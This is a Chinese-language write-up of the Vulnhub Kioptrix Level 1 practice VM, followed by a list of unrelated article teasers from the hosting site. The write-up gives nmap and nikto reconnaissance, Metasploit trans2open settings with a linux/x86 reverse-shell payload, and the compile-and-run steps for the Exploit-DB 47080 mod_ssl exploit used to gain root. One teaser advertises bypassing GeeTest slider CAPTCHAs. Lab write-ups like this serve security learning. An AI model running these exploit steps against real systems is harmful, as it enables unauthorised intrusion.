Vulnhub系列:Kioptix Level 1

1.环境配置

ifconfig

kali机:192.168.26.128(不同kali机不同ip)

靶机:桥接

特别说明:有的小伙伴在打开虚拟机后,无法获取到靶机IP地址

这里特别说明:修改“Kioptix Level 1.vmx”配置文件中ethernet0.networkName = "Nat"

2.相关知识点 

samba 2.2.1a 缓冲区溢出samba RCEApache/mod_ssl 缓冲区溢出msf_search_samba_version(模块)searchsploit

3.渗透测试

信息收集

主机发现

nmap -sP 192.168.26.0/24

可以知道靶机的ip地址为:192.168.26.132 

端口扫描:

nmap -sV 192.168.26.132

发现许多端口都开启了服务,我们查查具体服务是什么,然后找到相关服务漏洞,进行利用

 收集到端口的信息后,我们就去网上找相应服务的漏洞,并且进行利用

漏洞利用
samba

利用kali自带nikto: 找出漏洞名称(CVE-2001-0835

nikto -h 192.168.26.132

尝试利用

利用组件漏洞实现攻击

这里先介绍一个神器:metasploit

metasploit是一款开源的安全漏洞检测工具,可以识别安全性问题,提供安全风险情报。里面包含了常见的漏洞利用模块和生成各种木马。

这边在kali下,输入命令 msfconsole,启动metasploit,然后再搜索samba,看看samba有没有什么安全风险

利用metasplo 模块 t扫描Samba版本 

search smb_version

 看不出版本,先利用smb设置payload参数

msf6 > search smb_ver type:auxiliaryMatching Modules
================#  Name                               Disclosure Date  Rank    Check  Description-  ----                               ---------------  ----    -----  -----------0  auxiliary/scanner/smb/smb_version                   normal  No     SMB Version Detectionmsf6 > use 0 msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.26.132
msf6 auxiliary(scanner/smb/smb_version) > run 

 现在可以发现Samba服务的版本为2.2.1a

searchsploit samba 2.2.1a

1)trans2open(利用metasploit),因为我们是靶机在Linux上,所以利用use 1即可

search trans2openuse 1

 接下来我们需要设置payload,但是我们不知道哪些参数需要设置,运行下面命令即可

show options

发现有两个模块可以用,一个是RHOSTS,一个是RPORT。

先试rhosts:

set rhosts 192.168.26.132

 再试下rport:

set rport 139

两个模块都是  meterpreter一直died,无法获取shell。

网上冲浪了一波,解决方法是msf使用模块payload:

set rhosts 192.168.26.132
set host 192.168.26.128
set payload linux/x86/shell_reverse_tcp
run

然后就是输入命令查看主机名和修改密码,拿到主机权限:

whoami
hostname
passwd

 成功登录

 

Apache OpenSSL

除Samba服务外,还有一个Apache OpenSSL的服务。

利用组件漏洞实现攻击

从上图可以看到,这个apache服务是用的mod_ssl模块,按照之前的方法,先用msf搜索下有没有这个模块相关的漏洞,进入msfconsole模块,用msf进行搜索

并没有搜索到,这边给大家介绍另一个神器--searchsploit

searchsploit:一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。

这边使用searchsploit去看看mod_ssl模块有没有相关漏洞:

靶机的mod_ssl版本为2.8.4,加上我用的linux系统,所以这边exp选择三个.c中的一个,我这里选择47080.c(跟着网上教程走········)

先看下exp的路径,然后把exp复制过来,用gcc编译下

searchsploit -p 47080.c

可以看到这个exp路径为:

/usr/share/exploitdb/exploits/unix/remote/47080.c

然后在桌面新建一个ssl文件夹,将exp复制过去,然后编译一下:

 这边提示少了一个libssl-dev的库,安装下,然后再编译:

apt-get install libssl-dev

 

害,又出现问题了

说下之后的思路:

查看下执行helloworld需要什么参数:

可以看到这边使用方法是./helloworld + target + IP或域名 + 端口号 + -c

由于靶机版本是RedHat系列,Apache1.3.20

所以这边target选用0x6b,然后就是执行下列命令获取root权限:

./helloworld 0x6b 192.168.26.132 443 -c 40

总结:一个是利用msf自带的漏洞利用模块进行攻击,一个是用searchsploit找到exp,然后编译后执行攻击。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/875261.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

探索PyMuPDF:Python中的强大PDF处理库

探索PyMuPDF:Python中的强大PDF处理库 背景:为何选择PyMuPDF 在数字化时代,PDF文件因其跨平台的兼容性和对格式的严格保持而成为文档交换的通用格式。然而,处理PDF文件往往需要专门的工具或库。这就是PyMuPDF库的用武之地。PyMuP…

模方单体化功能联动3DMax能支持2018版本以上的3DMax吗?

答:目前还不支持,仅支持2018版本的 模方是一款针对实景三维模型的冗余碎片、水面残缺、道路不平、标牌破损、纹理拉伸模糊等共性问题研发的实景三维模型修复编辑软件。模方4.1新增自动单体化建模功能,支持一键自动提取房屋结构,平…

【Python selenium过极验滑块】用自动化selenium 操作GEETEST极验滑块,简单粗暴

文章日期:2024.07.24 使用工具:Python 文章类型:自动化过极验滑块 文章全程已做去敏处理!!! 【需要做的可联系我】 AES解密处理(直接解密即可)(crypto-js.js 标准算法&…

Python自动化测试之Selenium各浏览器驱动下载网址

在自动化测试领域,Selenium无疑是一个不可或缺的工具。它允许开发者编写脚本来模拟用户在浏览器中的操作,从而进行自动化测试。然而,为了使用Selenium控制不同的浏览器,我们需要安装相应的浏览器驱动(WebDriver&#x…

企业利用AI智能名片S2B2C商城小程序参与社区团购的风险与机遇分析

摘要 在新零售浪潮的推动下,社区团购以其独特的商业模式迅速崛起,成为连接消费者与供应商的重要桥梁。企业纷纷探索如何有效利用这一新兴渠道,以扩大市场份额、提升品牌影响力。AI智能名片S2B2C商城小程序的引入,为企业参与社区团…

maven archetype

1.简介 maven脚手架是为了创建一个项目模板&#xff0c;以后新建项目都能够复用该模板 maven中模板引擎使用的是velocity,在文件中可以使用它的语法获取变量等操作 2.实现 单模块脚手架实现 pom.xml <?xml version"1.0" encoding"UTF-8"?> &…

windows下实现mongodb备份还原

添加环境变量 把mongodb安装目录下的bin路径添加到环境变量的path路径: 备份库 打开CMD&#xff0c;执行以下命令&#xff1a; mongodump -u test -p test -d test -o D://backup_mongodb//20220706 –gzip 参数说明&#xff1a; -u 用户名 -p 密码 -d 需要备份的库名称…

MongoDB教程(二十一):MongoDB大文件存储GridFS

&#x1f49d;&#x1f49d;&#x1f49d;首先&#xff0c;欢迎各位来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里不仅可以有所收获&#xff0c;同时也能感受到一份轻松欢乐的氛围&#xff0c;祝你生活愉快&#xff01; 文章目录 引言一、GridFS…

学习笔记(数据结构:链表 栈)3

fun为回调函数由主函数决定 栈: 栈是限定仅在表尾进行插入和删除操作的线性表。 先进后出、后进先出 栈顶:允许操作的一端 栈底:不允许操作的一端 入栈&#xff0c;出栈。 顺序栈 链式栈 1.创建 CreateSeqStack 2.销毁 DestroySeqStack 3.判断是否为空栈 IsEm…

AD7606采集控制

过采样&#xff1a;其效果就是在ADC之后增加数字滤波器的功能

观测云加入华为云「新加坡云联盟」,引领亚太创新潮流

7月19日&#xff0c;「新加坡云联盟」在华为云新加坡峰会2024上正式宣告成立。这一创新的联合不仅是新加坡乃至整个亚太地区云服务领域的重要里程碑&#xff0c;更是全球数字化转型进程中的关键一步。 观测云作为联盟的首批成员之一&#xff0c;在成立仪式上精彩亮相&#xff0…

音视频入门基础:PCM专题(3)——使用Audacity工具分析PCM音频文件

音视频入门基础&#xff1a;PCM专题系列文章&#xff1a; 音视频入门基础&#xff1a;PCM专题&#xff08;1&#xff09;——使用FFmpeg命令生成PCM音频文件并播放 音视频入门基础&#xff1a;PCM专题&#xff08;2&#xff09;——使用Qt播放PCM音频文件 音视频入门基础&am…

Centos7下安装配置最新版本Jenkins

1、基础环境配置 1.1 服务器下载Jenkins安装包 下载地址&#xff1a;Download and deploy 下载命令&#xff1a;wget https://get.jenkins.io/war-stable/2.452.3/jenkins.war 1.2 服务器安装配置JDK Jenkins 是基于 Java 语言开发的&#xff0c;因此需要 Java 运行环境支…

MQ传递用户信息

theme: nico 你们好&#xff0c;我是金金金。 场景 购物车里面有5个商品&#xff0c;用户勾选了并且提交订单了&#xff0c;此时需要删除购物车对应勾选的商品&#xff0c;mq的话涉及到传递用户信息~因为删除对应的购物车商品是需要传递用户信息来知晓对应用户的 生产者 消费者…

LeetCode 热题 HOT 100 (010/100)【宇宙最简单版】

【链表】No. 0206 反转链表 【简单】&#x1f449;力扣对应题目指路 希望对你有帮助呀&#xff01;&#xff01;&#x1f49c;&#x1f49c; 如有更好理解的思路&#xff0c;欢迎大家留言补充 ~ 一起加油叭 &#x1f4a6; 欢迎关注、订阅专栏 【力扣详解】谢谢你的支持&#xf…

《操作系统》(学习笔记)(王道)

一、计算机系统概述 1.1 操作系统的基本概念 1.1.1 操作系统的概念 操作系统&#xff08;OperatinggSystem&#xff0c;OS&#xff09;是指控制和管理整个计算机系统的硬件与软件资源&#xff0c;合理地组织、调度计算机的工作与资源的分配&#xff0c;进而为用户和其他软件…

-XX:MaxDirectMemorySize和-Dio.netty.maxDirectMemory区别

-XX:MaxDirectMemorySize是java运行参数&#xff0c;用户控制java程序可以使用的最大直接内存&#xff08;堆外/本地&#xff09;&#xff1b; -Dio.netty.maxDirectMemory是netty运行参数&#xff0c;用户控制netty程序可以使用的最大直接内存&#xff08;堆外/本地&#xff…

SQL labs-SQL注入(四,sqlmap对于post传参方式的注入)

本文仅作为学习参考使用&#xff0c;本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 序言&#xff1a;本文主要讲解基于SQL labs靶场&#xff0c;sqlmap工具进行的post传参方式的SQL注入。 传参方式有两类&#xff0c;一类是直接在url栏内进行url编码后进行的传参&am…

反序列化-极客大挑战2019php【I have a cat!】

知道这个题考的是反序列化&#xff0c;那么我们第一反应该拿到他的源码。 根据这句话判断【因为每次猫猫都在我键盘上乱跳&#xff0c;所以我有一个良好的备份网站的习惯 不愧是我&#xff01;&#xff01;&#xff01; 】说明有目录 我们直接使用dir开扫&#xff0c;发现有压…

【Vue3】watch 监视 reactive 定义的数据

【Vue3】watch 监视 reactive 定义的数据 背景简介开发环境开发步骤及源码总结 背景 随着年龄的增长&#xff0c;很多曾经烂熟于心的技术原理已被岁月摩擦得愈发模糊起来&#xff0c;技术出身的人总是很难放下一些执念&#xff0c;遂将这些知识整理成文&#xff0c;以纪念曾经…